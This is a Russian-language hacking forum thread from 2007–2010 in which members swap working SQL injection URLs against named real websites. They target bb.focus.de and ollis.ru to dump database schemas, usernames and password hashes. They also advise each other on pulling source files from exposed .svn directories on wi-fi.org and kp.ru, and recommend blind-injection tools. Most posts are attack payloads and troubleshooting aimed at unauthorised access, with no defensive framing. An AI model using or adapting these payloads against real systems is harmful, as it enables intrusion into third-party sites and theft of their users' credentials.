Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Это PostgreSQL
    http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)--
     
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    таблицы норм выводится через limit offset но на колонки ругается
    пххп://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+column_name+from+information_schema.columns+where+table_name=chr(39)||pg_user||chr(39)+limit+1+offset+0)+as+int)--
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    имя таблицы лучше писать в сhr(), а не просто кавычки чарить, по аналогии с MySql, а у тебя гибрид какой-то конгениальный)
     
  4. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    сначала проверил и имя таблицы в char но ничего не вышло тот же яйцо , но с боку
     
  5. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    YuNi|[c,

    http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((select+table_name||chr(47)||column_name+from+information_schema.columns+where+column_name+like+chr(37)||chr(109)||chr(97)||chr(105)||chr(108)||chr(37)+limit+1+offset+6)+as+int)


    http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((select+username||chr(47)||user_password+from+phpbb_users2+limit+1+offset+1)+as+int)
     
    1 person likes this.
  6. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс но всетаки я немного не понял запрос.

    если например мне надо найти колонки с таблицы usage_privileges

    http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+table_name+from+information_schema.tables+limit+1+offset+3)+as+int)--
    так какой будеть запрос?
     
  7. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Не пойму,при переборе колонок на 5 значение вылетает пустая страничка,как поступить ????

    Сама sql http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4,5%23
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+column_name+from+information_schema.columns+where+table_name=chr(117)||chr(115)||chr(97)||chr(103)||chr(101)||chr(95)||chr(112)||chr(114)||chr(105)||chr(118)||chr(105)||chr(108)||chr(101)||chr(103)||chr(101)||chr(115)+limit+1+offset+0)+as+int)--
    http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+
     
    #11248 Kakoytoxaker, 31 Jan 2010
    Last edited: 31 Jan 2010
  9. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    А что это?))
     
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Это вывод с твоей скули. Читай статьи
     
  11. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    бло ппц
    сорри за тупой вопрос
    что не знал вообше про Postgresql ))

    ))
    спс всем за ответы
     
  12. Xeleon

    Xeleon New Member

    Joined:
    10 Jun 2009
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Нашол да одной социалке скулу, панголин сказал что это mysql 5 базы сказал,операционку,пользователя, но неможет подобрать таблицы, вернее их имена и колонки. Пробывал вручную но там blind sql injection. Как можно определить таблицы с базы и колнки таблиц? Кстате на ковычку ругается:
    PHP:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' order by auktionid DESC LIMIT 1' at line 1
    Пробывал перекодировать но все равно ругается.
     
  13. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    если там блинд юзай прогу toolza 1.0 от пашкела или marathon tools
    эти как раз для блинд скули удобно


    Кстати кто знает какой нит прогу encoder/decoder CHAR для mssql/postgresql/mysql
    ручками долго кодировать
     
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Через NAME_CONST можно сделать вывод. Способ описывал QWAZAR. Либо через блинд по символу определять. Скинь ссылку в личку.
     
  15. aldonin

    aldonin New Member

    Joined:
    11 Jan 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Извинит вопрос не по теме.Но все же задам.Кто нибудь может рассказать как можно получить исходники с помощью svn уязвимости нашел на http://www.wi-fi.org/.svn/entries и еще на kp.ru/.svn/entries может это что дать?В форуме есть по этой уязвимости посты но там не нашел нужной информации.Заранее спасибо,кто поможет!
     
  16. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    aldonin, http://habrahabr.ru/blogs/infosecurity/70330/

    Так что так. Поковыряй, может найдешь чего интересного

    http://www.wi-fi.org/.svn/text-base/info.php.svn-base
    http://kp.ru/.svn/text-base/autohandler.svn-base
     
    1 person likes this.
  17. aldonin

    aldonin New Member

    Joined:
    11 Jan 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Это я уже смотрел.А как они видели файловую структуру,такого не отображается почему-то?Пробывал через клиент но просит естественно пароль.Может там хеш валяется как нить полезный?=)
     
  18. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Делаю зарос

    http://www.ollis.ru/index.php?rest=1')%20union%20select%20*%20FROM%20(SELECT%20*%20FROM%20(SELECT%20NAME_CONST((SELECT%20concat_ws(0x3a,user_loginname,user_password)%20FROM%20e107.e107_user%20LIMIT%201),%2014)d)%20as%20t%20%20JOIN%20(SELECT%20NAME_CONST((SELECT%20concat_ws(0x3a,user_loginname,user_password)%20FROM%20e107.e107_user%20LIMIT%201),%2014)e)%20b)a%23

    выводит только логин , как найти пароль?
     
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Не выводит он логина, а пишет, что доступ к таблице e107_user текущему пользователю запрещен.
     
  20. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    И как это обойти?И возможно ли?
     
Thread Status:
Not open for further replies.